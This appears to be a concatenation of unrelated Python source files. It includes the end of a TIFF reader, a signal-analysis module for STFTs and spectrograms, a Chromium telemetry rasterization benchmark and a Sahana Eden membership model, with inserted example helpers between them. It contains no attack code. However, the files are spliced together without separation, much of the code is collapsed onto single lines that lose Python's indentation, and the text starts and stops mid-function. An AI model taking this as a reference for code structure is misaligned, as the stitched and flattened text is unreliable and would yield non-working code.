bitspersample=page.bits_per_sample, photometric=page.photometric, interpolation=settings.interpol, dpi=settings.dpi) pyplot.show() TIFFfile = TiffFile # backwards compatibility if sys.version_info[0] > 2: basestring = str, bytes unicode = str if __name__ == "__main__": sys.exit(main())
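

# -----------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): a small helper showing
# how the TiffFile class and the imshow() function defined above might be used
# together from another script, following the same calls made in main().  The
# path argument is supplied by the caller; matplotlib is assumed to be
# installed, as imshow() requires.
def _example_show_first_page(path):
    """Read the first page of a TIFF file and display it with imshow()."""
    from matplotlib import pyplot  # imshow() expects pyplot to be importable
    tif = TiffFile(path)
    try:
        page = tif[0]
        data = tif.asarray(key=0)
    finally:
        tif.close()
    imshow(data,
           title=str(page),
           photometric=page.photometric,
           bitspersample=page.bits_per_sample)
    pyplot.show()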
# -*- coding: utf-8 -*- # Copyright (c) 2013-2016 The siganalysis developers. All rights reserved. # Project site: https://github.com/questrail/siganalysis # Use of this source code is governed by a MIT-style license that # can be found in the LICENSE.txt file for the project. """Provide Python routines for signal analysis Provide various analysis routines required for analyzing signals in Python, such as calculating a Short-Time Fourier Transform, plotting an STFT's spectrogram, calculating the peak hold values for an STFT, etc. """ # Try to future proof code so that it's Python 3.x ready from __future__ import print_function from __future__ import unicode_literals from __future__ import division from __future__ import absolute_import # Numerical analysis related imports import numpy as np import scipy import matplotlib.pyplot as plt __version__ = '0.4.0' def time_slice_zip(number_of_samples, samples_per_time_slice): """Create a zipped list of tuples for time slicing a numpy array When dealing with large numpy arrays containing time series data, it is often desirable to time slice the data on a fixed duration, such as one minute. This function creates a list of tuples (similar to the Python zip function) to iterate through a numpy array using slices. Args: number_of_samples: Number of samples in the time series numpy array samples_per_time_slice: Desired number of samples per time slice not including the last time slice which will be limited to the length of the time series Returns: A list of tuples that can be used to time slice the data. """ current_index = 0 zipped = [] while current_index < (number_of_samples - samples_per_time_slice): this_tuple = current_index, current_index + samples_per_time_slice zipped.append(this_tuple) current_index += samples_per_time_slice zipped.append((current_index, number_of_samples)) return zipped def stft(input_data, sampling_frequency_hz, frame_size_sec, hop_size_sec, use_hamming_window=True): """Calculates the Short Time Fourier Transform Using code based on http://stackoverflow.com/a/6891772/95592 calculate the STFT. Args: input_data: A 1D numpy ndarray containing the signal in the time domain that will be converted to the freq domain via STFT. sampling_frequency_hz: Sampling frequency originally used to capture the input_data frame_size_sec: Frame size given in seconds. The frame size determines how long each FFT will be in the time domain. hop_size_sec: Hop size given in seconds. The hop size is the time by which the frame should be shifted forward for the next FFT. It is not uncommon for this to be less than the frame size so that there is some amount of overlap. use_hamming_window: A Boolean indicating if the Hamming window should be used when performing the FFT. Using a Hamming window helps. Returns: A tuple containing: 1. A 2D numpy ndarray providing the amplitude of the STFT with respect to the frequency and time having a shape of (time, freq). This array is trimmed to be single-sided instead of returning the double-sided FFT, and it is normalized by 2/N where N is the length of the frequency domain info. The DC component is not multiplied by 2 though, it is just normalized by 1/N. 2. A 1D numpy ndarray [shape = (time,)] containing the time in seconds for each value in the stft_data along the time axis. 3. A 1D numpy ndarray [shape = (freq,)] containing the freq in Hz for each value in the stft_data along the frequency axis. 4. 
A float indicating the frequency bin size in Hz or what is also referred to as the frequency domain step size (not to be confused with or equal to the sampling frequency). """ num_frame_samples = int(frame_size_sec * sampling_frequency_hz) num_hop_samples = int(hop_size_sec * sampling_frequency_hz) if (use_hamming_window): x = np.array([ scipy.fft( 2 * scipy.hamming(num_frame_samples) * input_data[i:i+num_frame_samples]) for i in range( 0, len(input_data)-num_frame_samples, num_hop_samples)]) else: x = np.array([ scipy.fft(input_data[i:i+num_frame_samples]) for i in range( 0, len(input_data)-num_frame_samples, num_hop_samples)]) # Normalize the FFT results # See "Description and Application of Fourier Transforms and Fourier # Series" rev A05 by Matthew Rankin for a description on why the # normalization is 2 / N except for the DC component which is 1 / N # Only deal with the single-sided FFT, so cut it in half x = x[:, :num_frame_samples//2] # Convert from complex to absolute values x = np.abs(x) # Divide all components by the num_frame_samples # Multiply all but the DC component by 2 non_dc_normalization = 2 / num_frame_samples x[:, 1:] = x[:, 1:] * non_dc_normalization x[:, 0] = x[:, 0] / num_frame_samples # Create the time vector # FIXME(mdr): Need to add test to make sure this is correctly calculated. # Might want to refactor into separate function. time_vector_stft = np.linspace( 0, (x.shape[0] - 1) * hop_size_sec, x.shape[0]) # Calculate the width of each frequency bin hz_per_freq_bin = sampling_frequency_hz / num_frame_samples # Create the frequency vector freq_vector_stft = np.arange(x.shape[1]) * hz_per_freq_bin return (x, time_vector_stft, freq_vector_stft, hz_per_freq_bin) def hz2khz(frequency_in_hz): """Convert from Hz to kHz Args: frequency_in_hz: A float containing the frequency value in Hz that is to be converted. Return: The frequency in kHz. """ return frequency_in_hz / 1000 def smooth(x, window_len=11, window='hanning'): """smooth the data using a window with requested size. cookb_signalsmooth.py from: http://scipy.org/Cookbook/SignalSmooth This method is based on the convolution of a scaled window with the signal. The signal is prepared by introducing reflected copies of the signal (with the window size) in both ends so that transient parts are minimized in the begining and end part of the output signal. Args: x: The input signal to be smoothed window_len: the dimension of the smoothing window window: The type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman' flat window will produce a moving average smoothing. Returns: the smoothed signal example: import numpy as np t = np.linspace(-2,2,0.1) x = np.sin(t)+np.random.randn(len(t))*0.1 y = smooth(x) see also: numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve, scipy.signal.lfilter """ if x.ndim != 1: raise ValueError('Function smooth only accepts 1D arrays.') if x.size < window_len: raise IndexError('Input vector needs to be bigger than window size.') if window_len < 3: return x if window_len & 1: pass else: window_len += 1 if window not in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']: raise ValueError("Window must be one of: 'flat', 'hanning', " "'hamming', 'bartlett', 'blackman'") s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]] if window == 'flat': w = np.ones(window_len, 'd') else: w = eval('np.' 
+ window + '(window_len)') y = np.convolve(w/w.sum(), s, mode='valid') samples_to_strip = (window_len - 1) / 2 return y[samples_to_strip:len(y)-samples_to_strip] def smooth2(x, beta=3, window_len=11): """Smooth function using Kaiser window Args: x: ndarray containing the signal to be smoothed beta: beta to use as part of the Kaiser smoothing window_len: Integer length of window to be used in Kaiser smoothing, which must be odd or it will be made odd. Returns: An ndarrary containing the smoothed signal. """ # If window_len is not odd, add one so that it is odd if window_len & 1: pass else: window_len += 1 s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]] w = np.kaiser(window_len, beta) y = np.convolve(w/w.sum(), s, mode='valid') samples_to_strip = (window_len - 1) / 2 return y[samples_to_strip:len(y)-samples_to_strip] def calculate_peak_hold(stft_data, frequency_array): """Calculate the peak hold for a given STFT dataset. Args: stft_data: A 2D numpy ndarray with shape (time, freq) containing the amplitude vs freq vs time. frequency_array: A 1d numpy ndarray containing the frequencies for the stft_data. Returns: peak_hold: A 1D numpy structured array containing the frequency and amplitude with the dtype [(freq, amp)] Raises: ValueError: The frequency_array and stft_data[1] are not the same length. """ if frequency_array.size != stft_data.shape[1]: raise IndexError('The size of the frequency_array does not match ' 'the STFT data.') data_type = np.dtype([('frequency', 'f8'), ('amplitude', 'f8')]) peak_hold = np.zeros(frequency_array.size, dtype=data_type) peak_hold['frequency'] = frequency_array peak_hold['amplitude'] = np.amax(stft_data, axis=0) return peak_hold def plot_spectrogram(stft_data, time_vector, freq_vector, plot_axis, freq_plot_range=False, time_plot_range=False, plot_title=False, plot_xlabel=False, plot_ylabel=False, colorbar_label=False, colorbar_fontsize=8): """Create a spectrogram plot Take a numpy ndarray containing amplitude vs. frequency vs. time info and create a spectrogram. Currently, this assumes that the stft_data starts at 0 Hz and uses the given hz_per_freq_bin. It would be better if I passed in a freq array similar to the time_array that is passed. Args: stft_data: A 2D numpy ndarray of shape (time, freq) containing the amplitude over both freq and time. time_vector: A 1d numpy ndarray containing the time in seconds for each value in the stft_data along the time axis. time_vector is assumed to be sorted and to contain equal time steps. freq_vector: A 1d numpy ndarray containing the freq in Hz for each value in the stft_data along the frequency axis. freq_vector is assumed to be sorted and to contain equal frequency steps. plot_axis: matplotlip axis that this plot should be added to freq_plot_range: A tuple containing the start and stop frequency in Hz for the spectrogram plot (frequencies are inclusive) time_plot_range: A tuple containing the start and stop time in seconds for the spectrogram plot (time are inclusive) plot_title: An optional string with the plot title plot_xlabel: An optional string with the x-axis label plot_ylabel: An optional string with the y-axis label colorbar_label: An optional string with the label to be added to the colorbar. If excluded then the colorbar is not plotted. colorbar_fontsize: Integer of the colorbar font size. 
Returns: matplolib handle to the spectrogram """ if freq_plot_range is False: start_freq_plot = freq_vector[0] stop_freq_plot = freq_vector[-1] else: start_freq_plot, stop_freq_plot = freq_plot_range # FIXME: Is there an error in the time plot range or the calculation of the # start and stop time bins? if time_plot_range is False: start_time_plot = time_vector[0] stop_time_plot = time_vector[-1] else: start_time_plot, stop_time_plot = time_plot_range # Calculate the hz_per_freq_bin assuming that the frequency steps are # equal. hz_per_freq_bin = freq_vector[1] - freq_vector[0] sec_per_time_bin = time_vector[1] - time_vector[0] # Determine the frequency bins for the start and stop freqs start_freq_bin = int((start_freq_plot - freq_vector[0]) / hz_per_freq_bin) stop_freq_bin = int((stop_freq_plot - freq_vector[0]) / hz_per_freq_bin) start_time_bin = int((start_time_plot - time_vector[0]) / sec_per_time_bin) stop_time_bin = int((stop_time_plot - time_vector[0]) / sec_per_time_bin) # Create the spectrogram spectrogram = plot_axis.imshow( stft_data[start_time_bin:stop_time_bin, start_freq_bin:stop_freq_bin].T, origin='lower', aspect='auto', interpolation='nearest') if colorbar_label: cb = plt.colorbar(spectrogram, ax=plot_axis) cb.ax.tick_params(labelsize=colorbar_fontsize) cb.set_label(colorbar_label) spectrogram.set_extent([start_time_plot, stop_time_plot, start_freq_plot, stop_freq_plot]) if plot_title: plot_axis.set_title(plot_title) if plot_xlabel: plot_axis.set_xlabel(plot_xlabel) if plot_ylabel: plot_axis.set_ylabel(plot_ylabel) return spectrogram def plot_peak_hold(axis, stft_data, frequency_array, title=False, xlabel=False, ylabel=False, plot_freq_limits=False, plot_amp_limits=False, limit_array=False, trace_label=False): """Plot the peak hold for a 2D STFT array Args: axis: matplotlip axis that this plot should be added to stft_data: A 2D numpy ndarray of shape (time, freq) containing the amplitude over both freq and time. frequency_array: A 1D numpy ndarray containing hte frequencies in Hz of the stft_data. title: An optional title to be added to the plot xlabel: An optional x-axis label to be added to the plot ylabel: An optional y-axis label to be added to the plot plot_freq_limits: An optional tuple containing the starting and ending frequencies to be used in the plot limit_array: An optional 1D numpy ndarray containing the limits for the plotted data of dtype = [('frequency', 'f8'), ('amplitude', 'f8')] Returns: matplolib handle to the axis Raises: """ peak_hold = calculate_peak_hold(stft_data, frequency_array) if trace_label is not False: axis.loglog(peak_hold['frequency'], peak_hold['amplitude'], label=trace_label) else: axis.loglog(peak_hold['frequency'], peak_hold['amplitude']) if limit_array is not False: axis.loglog(limit_array['frequency'], limit_array['amplitude']) if plot_freq_limits is not False: axis.set_xlim(plot_freq_limits) if plot_amp_limits is not False: axis.set_ylim(plot_amp_limits) if title is not False: axis.set_title(title) if xlabel is not False: axis.set_xlabel(xlabel) if ylabel is not False: axis.set_ylabel(ylabel) axis.xaxis.set_major_formatter(plt.FormatStrFormatter('%g')) axis.yaxis.set_major_formatter(plt.FormatStrFormatter('%g')) axis.grid(b=True, which='major', color='0.25', linestyle='-') axis.grid(b=True, which='minor', color='0.75', linestyle='-') axis.set_axisbelow(True) def single_frequency_over_time(stft_data, freq_array, time_array, frequency): """Determine the amplitude vs. 
time for a particular frequency

    Given an STFT data array and its supporting frequency and time arrays, as
    well as a desired frequency, determine the amplitude for just that
    frequency.

    Args:
        stft_data: A 2D numpy ndarray containing the amplitude vs. frequency
            vs. time from a Short-Time Fourier Transform.
        freq_array: A 1D numpy ndarray containing the frequencies in Hz for
            the given STFT data.
        time_array: A 1D numpy ndarray containing the time values in seconds
            for the given STFT data.
        frequency: A float or int of the desired frequency

    Returns:
        A 1D numpy structured array of dtype
        [('time', 'f8'), ('amplitude', 'f8')]

    Raises:
        IndexError: The size of the STFT does not match the given frequency
            and/or time arrays.
    """
    # Check that the arrays are the correct size
    if freq_array.size != stft_data.shape[1]:
        raise IndexError('The size of the freq_array does not match '
                         'the STFT data.')
    if time_array.size != stft_data.shape[0]:
        raise IndexError('The size of the time_array does not match '
                         'the STFT data.')
    # Create the array to return the time and amplitude
    data_type = np.dtype([('time', 'f8'), ('amplitude', 'f8')])
    stft_at_frequency = np.zeros(time_array.size, dtype=data_type)
    stft_at_frequency['time'] = time_array
    # Map the requested frequency to a bin index, assuming the frequency axis
    # starts at 0 Hz with equal bin spacing
    freq_bin = int(frequency / (freq_array[1] - freq_array[0]))
    stft_at_frequency['amplitude'] = stft_data[:, freq_bin]
    return stft_at_frequency
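

# -----------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): a minimal example of
# chaining stft(), calculate_peak_hold() and plot_spectrogram() for a
# synthetic 1 kHz tone sampled at 10 kHz.  The frame/hop sizes are arbitrary
# example values, and scipy.fft/scipy.hamming are assumed to behave as stft()
# above expects (older SciPy releases).
def _example_spectrogram():
    fs_hz = 10e3
    t = np.arange(0, 2.0, 1 / fs_hz)
    tone = np.sin(2 * np.pi * 1e3 * t)
    stft_data, time_vec, freq_vec, bin_hz = stft(
        tone, fs_hz, frame_size_sec=0.1, hop_size_sec=0.05)
    peak_hold = calculate_peak_hold(stft_data, freq_vec)
    fig, axis = plt.subplots()
    plot_spectrogram(stft_data, time_vec, freq_vec, axis,
                     plot_title='1 kHz tone',
                     plot_xlabel='Time (s)',
                     plot_ylabel='Frequency (Hz)',
                     colorbar_label='Amplitude')
    plt.show()
    return peak_hold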
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import sys import time from telemetry.core.util import TimeoutException from telemetry.page import page_measurement from telemetry.page import page_test class RasterizeAndRecordMicro(page_measurement.PageMeasurement): def __init__(self): super(RasterizeAndRecordMicro, self).__init__('') self._chrome_branch_number = None @classmethod def AddCommandLineArgs(cls, parser): parser.add_option('--start-wait-time', type='float', default=2, help='Wait time before the benchmark is started ' '(must be long enought to load all content)') parser.add_option('--rasterize-repeat', type='int', default=100, help='Repeat each raster this many times. Increase ' 'this value to reduce variance.') parser.add_option('--record-repeat', type='int', default=100, help='Repeat each record this many times. Increase ' 'this value to reduce variance.') parser.add_option('--timeout', type='int', default=120, help='The length of time to wait for the micro ' 'benchmark to finish, expressed in seconds.') parser.add_option('--report-detailed-results', action='store_true', help='Whether to report additional detailed results.') def CustomizeBrowserOptions(self, options): options.AppendExtraBrowserArgs([ '--enable-impl-side-painting', '--force-compositing-mode', '--enable-threaded-compositing', '--enable-gpu-benchmarking' ]) def DidStartBrowser(self, browser): # TODO(vmpstr): Remove this temporary workaround when reference build has # been updated to branch 1713 or later. backend = browser._browser_backend # pylint: disable=W0212 self._chrome_branch_number = getattr(backend, 'chrome_branch_number', None) if (not self._chrome_branch_number or (sys.platform != 'android' and self._chrome_branch_number < 1713)): raise page_test.TestNotSupportedOnPlatformFailure( 'rasterize_and_record_micro requires Chrome branch 1713 ' 'or later. 
Skipping measurement.') def MeasurePage(self, page, tab, results): try: tab.WaitForJavaScriptExpression("document.readyState == 'complete'", 10) except TimeoutException: pass time.sleep(self.options.start_wait_time) record_repeat = self.options.record_repeat rasterize_repeat = self.options.rasterize_repeat # Enqueue benchmark tab.ExecuteJavaScript(""" window.benchmark_results = {}; window.benchmark_results.done = false; window.benchmark_results.id = chrome.gpuBenchmarking.runMicroBenchmark( "rasterize_and_record_benchmark", function(value) { window.benchmark_results.done = true; window.benchmark_results.results = value; }, { "record_repeat_count": """ + str(record_repeat) + """, "rasterize_repeat_count": """ + str(rasterize_repeat) + """ }); """) benchmark_id = tab.EvaluateJavaScript('window.benchmark_results.id') if (not benchmark_id): raise page_measurement.MeasurementFailure( 'Failed to schedule rasterize_and_record_micro') tab.WaitForJavaScriptExpression( 'window.benchmark_results.done', self.options.timeout) data = tab.EvaluateJavaScript('window.benchmark_results.results') pixels_recorded = data['pixels_recorded'] record_time = data['record_time_ms'] pixels_rasterized = data['pixels_rasterized'] rasterize_time = data['rasterize_time_ms'] results.Add('pixels_recorded', 'pixels', pixels_recorded) results.Add('record_time', 'ms', record_time) results.Add('pixels_rasterized', 'pixels', pixels_rasterized) results.Add('rasterize_time', 'ms', rasterize_time) # TODO(skyostil): Remove this temporary workaround when reference build has # been updated to branch 1931 or later. if ((self._chrome_branch_number and self._chrome_branch_number >= 1931) or sys.platform == 'android'): record_time_sk_null_canvas = data['record_time_sk_null_canvas_ms'] record_time_painting_disabled = data['record_time_painting_disabled_ms'] record_time_skrecord = data['record_time_skrecord_ms'] results.Add('record_time_sk_null_canvas', 'ms', record_time_sk_null_canvas) results.Add('record_time_painting_disabled', 'ms', record_time_painting_disabled) results.Add('record_time_skrecord', 'ms', record_time_skrecord) if self.options.report_detailed_results: pixels_rasterized_with_non_solid_color = \ data['pixels_rasterized_with_non_solid_color'] pixels_rasterized_as_opaque = \ data['pixels_rasterized_as_opaque'] total_layers = data['total_layers'] total_picture_layers = data['total_picture_layers'] total_picture_layers_with_no_content = \ data['total_picture_layers_with_no_content'] total_picture_layers_off_screen = \ data['total_picture_layers_off_screen'] results.Add('pixels_rasterized_with_non_solid_color', 'pixels', pixels_rasterized_with_non_solid_color) results.Add('pixels_rasterized_as_opaque', 'pixels', pixels_rasterized_as_opaque) results.Add('total_layers', 'count', total_layers) results.Add('total_picture_layers', 'count', total_picture_layers) results.Add('total_picture_layers_with_no_content', 'count', total_picture_layers_with_no_content) results.Add('total_picture_layers_off_screen', 'count', total_picture_layers_off_screen)
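

# -----------------------------------------------------------------------------
# Illustrative sketch (not part of the original measurement): the
# enqueue-and-poll pattern used in MeasurePage above, written out as a helper.
# It relies only on the tab methods already used in this file
# (ExecuteJavaScript, EvaluateJavaScript, WaitForJavaScriptExpression); the
# benchmark name, settings JSON and timeout are caller-supplied placeholders.
def _run_micro_benchmark(tab, benchmark_name, settings_js, timeout_seconds):
  tab.ExecuteJavaScript("""
      window.benchmark_results = {};
      window.benchmark_results.done = false;
      window.benchmark_results.id =
          chrome.gpuBenchmarking.runMicroBenchmark(
              '""" + benchmark_name + """',
              function(value) {
                window.benchmark_results.done = true;
                window.benchmark_results.results = value;
              }, """ + settings_js + """);
      """)
  if not tab.EvaluateJavaScript('window.benchmark_results.id'):
    raise page_measurement.MeasurementFailure(
        'Failed to schedule %s' % benchmark_name)
  tab.WaitForJavaScriptExpression(
      'window.benchmark_results.done', timeout_seconds)
  return tab.EvaluateJavaScript('window.benchmark_results.results')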
# -*- coding: utf-8 -*- """ Sahana Eden Members Model @copyright: 2012-15 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __all__ = ("S3MembersModel", "S3MemberProgrammeModel", "member_rheader" ) import datetime from gluon import * from gluon.storage import Storage from ..s3 import * from s3layouts import S3AddResourceLink # ============================================================================= class S3MembersModel(S3Model): """ """ names = ("member_membership_type", "member_membership", "member_membership_id", ) def model(self): T = current.T db = current.db auth = current.auth s3 = current.response.s3 organisation_id = self.org_organisation_id ADMIN = current.session.s3.system_roles.ADMIN is_admin = auth.s3_has_role(ADMIN) add_components = self.add_components configure = self.configure crud_strings = s3.crud_strings define_table = self.define_table root_org = auth.root_org() if is_admin: filter_opts = () elif root_org: filter_opts = (root_org, None) else: filter_opts = (None,) # --------------------------------------------------------------------- # Membership Types # tablename = "member_membership_type" define_table(tablename, Field("name", notnull=True, length=64, label = T("Name"), ), # Only included in order to be able to set # realm_entity to filter appropriately organisation_id(default = root_org, readable = is_admin, writable = is_admin, ), s3_comments(label = T("Description"), comment = None, ), *s3_meta_fields()) ADD_MEMBERSHIP_TYPE = T("Create Membership Type") crud_strings[tablename] = Storage( label_create = ADD_MEMBERSHIP_TYPE, title_display = T("Membership Type Details"), title_list = T("Membership Types"), title_update = T("Edit Membership Type"), title_upload = T("Import Membership Types"), label_list_button = T("List Membership Types"), label_delete_button = T("Delete Membership Type"), msg_record_created = T("Membership Type added"), msg_record_modified = T("Membership Type updated"), msg_record_deleted = T("Membership Type deleted"), msg_list_empty = T("No membership types currently registered")) represent = S3Represent(lookup=tablename, translate=True) membership_type_id = S3ReusableField("membership_type_id", "reference %s" % tablename, label = T("Type"), ondelete = "SET NULL", represent = represent, requires = IS_EMPTY_OR( IS_ONE_OF(db, "member_membership_type.id", represent, filterby="organisation_id", filter_opts=filter_opts)), sortby = "name", comment=S3AddResourceLink(f="membership_type", label=ADD_MEMBERSHIP_TYPE, title=ADD_MEMBERSHIP_TYPE, 
tooltip=T("Add a new membership type to the catalog.")), ) configure(tablename, deduplicate = self.member_type_duplicate, ) # --------------------------------------------------------------------- # Members # tablename = "member_membership" define_table(tablename, organisation_id( empty = False, requires = self.org_organisation_requires( updateable = True, ), ), Field("code", label = T("Member ID"), #readable = False, #writable = False, ), self.pr_person_id( comment = None, requires = IS_ADD_PERSON_WIDGET2(), widget = S3AddPersonWidget2(controller="member"), ), membership_type_id(), # History s3_date("start_date", label = T("Date Joined"), ), s3_date("end_date", label = T("Date resigned"), start_field = "member_membership_start_date", default_interval = 12, ), Field("membership_fee", "double", label = T("Membership Fee"), ), s3_date("membership_paid", label = T("Membership Paid"), ), Field("fee_exemption", "boolean", label = T("Exempted from Membership Fee"), default = False, # Expose in templates as needed: readable = False, writable = False, ), # Location (from pr_address component) self.gis_location_id(readable = False, writable = False, ), Field.Method("paid", self.member_membership_paid), *s3_meta_fields()) crud_strings[tablename] = Storage( label_create = T("Create Member"), title_display = T("Member Details"), title_list = T("Members"), title_update = T("Edit Member"), title_upload = T("Import Members"), label_list_button = T("List Members"), label_delete_button = T("Delete Member"), msg_record_created = T("Member added"), msg_record_modified = T("Member updated"), msg_record_deleted = T("Member deleted"), msg_list_empty = T("No Members currently registered")) # Which levels of Hierarchy are we using? levels = current.gis.get_relevant_hierarchy_levels() list_fields = ["person_id", "organisation_id", "membership_type_id", "start_date", # useful for testing the paid virtual field #"membership_paid", (T("Paid"), "paid"), (T("Email"), "email.value"), (T("Phone"), "phone.value"), ] report_fields = ["person_id", "membership_type_id", (T("Paid"), "paid"), "organisation_id", ] text_fields = ["membership_type_id", "organisation_id$name", "organisation_id$acronym", "person_id$first_name", "person_id$middle_name", "person_id$last_name", ] for level in levels: lfield = "location_id$%s" % level list_fields.append(lfield) report_fields.append(lfield) text_fields.append(lfield) if current.deployment_settings.get_org_branches(): org_filter = S3HierarchyFilter("organisation_id", # Can be unhidden in customise_xx_resource if there is a need to use a default_filter hidden = True, leafonly = False, ) else: org_filter = S3OptionsFilter("organisation_id", filter = True, header = "", # Can be unhidden in customise_xx_resource if there is a need to use a default_filter hidden = True, ) filter_widgets = [ S3TextFilter(text_fields, label = T("Search"), ), org_filter, S3OptionsFilter("membership_type_id", cols = 3, hidden = True, ), S3OptionsFilter("paid", cols = 3, label = T("Paid"), options = {T("paid"): T("paid"), T("overdue"): T("overdue"), T("expired"): T("expired"), #T("exempted"): T("exempted"), }, hidden = True, ), S3LocationFilter("location_id", label = T("Location"), levels = levels, hidden = True, ), ] report_options = Storage(rows = report_fields, cols = report_fields, facts = report_fields, defaults = Storage( cols = "membership.organisation_id", rows = "membership.membership_type_id", fact = "count(membership.person_id)", totals = True, ) ) configure(tablename, create_next = URL(f="person", 
args="address", vars={"membership.id": "[id]"}), deduplicate = self.member_duplicate, extra_fields = ("start_date", "membership_paid", "fee_exemption", ), filter_widgets = filter_widgets, list_fields = list_fields, onaccept = self.member_onaccept, report_options = report_options, # Default summary summary = [{"name": "addform", "common": True, "widgets": [{"method": "create"}], }, {"name": "table", "label": "Table", "widgets": [{"method": "datatable"}] }, {"name": "report", "label": "Report", "widgets": [{"method": "report", "ajax_init": True}] }, {"name": "map", "label": "Map", "widgets": [{"method": "map", "ajax_init": True}], }, ], update_realm = True, ) # Components self.add_components(tablename, # Contact Information pr_contact = (# Email {"name": "email", "link": "pr_person", "joinby": "id", "key": "pe_id", "fkey": "pe_id", "pkey": "person_id", "filterby": "contact_method", "filterfor": ("EMAIL",), }, # Phone {"name": "phone", "link": "pr_person", "joinby": "id", "key": "pe_id", "fkey": "pe_id", "pkey": "person_id", "filterby": "contact_method", "filterfor": ("SMS", "HOME_PHONE", "WORK_PHONE", ), }, ), hrm_programme = {"link": "member_membership_programme", "joinby": "membership_id", "key": "programme_id", }, ) represent = S3Represent(lookup=tablename, fields=["code"]) membership_id = S3ReusableField("membership_id", "reference %s" % tablename, label = T("Member"), ondelete = "CASCADE", represent = represent, requires = IS_ONE_OF(db, "member_membership.id", represent, ), ) # --------------------------------------------------------------------- # Pass names back to global scope (s3.*) # return dict(member_membership_id = membership_id) # ------------------------------------------------------------------------- @staticmethod def member_membership_paid(row): """ Whether the member has paid within 12 months of start_date anniversary @ToDo: Formula should come from the deployment_template """ T = current.T #try: # exempted = row["member_membership.fee_exemption"] #except AttributeError: # exempted = False #if excempted: # return T("exempted") try: start_date = row["member_membership.start_date"] except AttributeError: # not available start_date = None try: paid_date = row["member_membership.membership_paid"] except AttributeError: # not available paid_date = None if start_date: PAID = T("paid") OVERDUE = T("overdue") LAPSED = T("expired") lapsed = datetime.timedelta(days=183) # 6 months year = datetime.timedelta(days=365) now = current.request.utcnow.date() if not paid_date: # Never renewed since Membership started # => due within 1 year due = start_date + year if now < due: return PAID elif now > (due + lapsed): return LAPSED else: return OVERDUE now_month = now.month start_month = start_date.month if now_month > start_month: due = datetime.date(now.year, start_month, start_date.day) elif now_month == start_month: now_day = now.day start_day = start_date.day if now_day >= start_day: due = datetime.date(now.year, start_month, start_day) else: due = datetime.date((now.year - 1), start_month, start_day) else: # now_month < start_month due = datetime.date((now.year - 1), start_month, start_date.day) if paid_date >= due: return PAID elif (due - paid_date) > lapsed: return LAPSED else: return OVERDUE return current.messages["NONE"] # --------------------------------------------------------------------- @staticmethod def member_onaccept(form): """ On-accept for Member records """ db = current.db s3db = current.s3db auth = current.auth setting = current.deployment_settings utable = 
current.auth.settings.table_user ptable = s3db.pr_person ltable = s3db.pr_person_user mtable = db.member_membership # Get the full record _id = form.vars.id if _id: query = (mtable.id == _id) record = db(query).select(mtable.id, mtable.person_id, mtable.organisation_id, mtable.deleted, limitby=(0, 1)).first() else: return data = Storage() # Affiliation, record ownership and component ownership # @ToDo #s3db.pr_update_affiliations(mtable, record) # realm_entity for the pr_person record person_id = record.person_id person = Storage(id = person_id) if setting.get_auth_person_realm_member_org(): # Set pr_person.realm_entity to the human_resource's organisation pe_id organisation_id = record.organisation_id entity = s3db.pr_get_pe_id("org_organisation", organisation_id) if entity: auth.set_realm_entity(ptable, person, entity = entity, force_update = True) # Update the location ID from the Home Address atable = s3db.pr_address query = (atable.pe_id == ptable.pe_id) & \ (ptable.id == record.person_id) & \ (atable.type == 1) & \ (atable.deleted == False) address = db(query).select(atable.location_id, limitby=(0, 1)).first() if address: data.location_id = address.location_id # Add record owner (user) query = (ptable.id == record.person_id) & \ (ltable.pe_id == ptable.pe_id) & \ (utable.id == ltable.user_id) user = db(query).select(utable.id, utable.organisation_id, utable.site_id, limitby=(0, 1)).first() if user: data.owned_by_user = user.id if not data: return record.update_record(**data) # ------------------------------------------------------------------------- @staticmethod def member_duplicate(item): """ Member record duplicate detection, used for the deduplicate hook """ data = item.data person_id = data.get("person_id") organisation_id = data.get("organisation_id") table = item.table # 1 Membership record per Person<>Organisation query = (table.deleted != True) & \ (table.person_id == person_id) & \ (table.organisation_id == organisation_id) row = current.db(query).select(table.id, limitby=(0, 1)).first() if row: item.id = row.id item.method = item.METHOD.UPDATE # ------------------------------------------------------------------------- @staticmethod def member_type_duplicate(item): """ Membership Type duplicate detection, used for the deduplicate hook """ data = item.data name = data.get("name") organisation_id = data.get("organisation_id") table = item.table # 1 Membership Type per Name<>Organisation query = (table.deleted != True) & \ (table.name == name) & \ (table.organisation_id == organisation_id) row = current.db(query).select(table.id, limitby=(0, 1)).first() if row: item.id = row.id item.method = item.METHOD.UPDATE # ============================================================================= class S3MemberProgrammeModel(S3Model): """ Member Programmes Model """ names = ("member_membership_programme", ) def model(self): # --------------------------------------------------------------------- # Link between members and programmes # tablename = "member_membership_programme" self.define_table(tablename, self.hrm_programme_id(), self.member_membership_id(), *s3_meta_fields()) # --------------------------------------------------------------------- # Pass names back to global scope (s3.*) # return {} # ============================================================================= def member_rheader(r, tabs=[]): """ Resource headers for component views """ if r.representation != "html": # RHeaders only used in interactive views return None record = r.record if record is None: # List or 
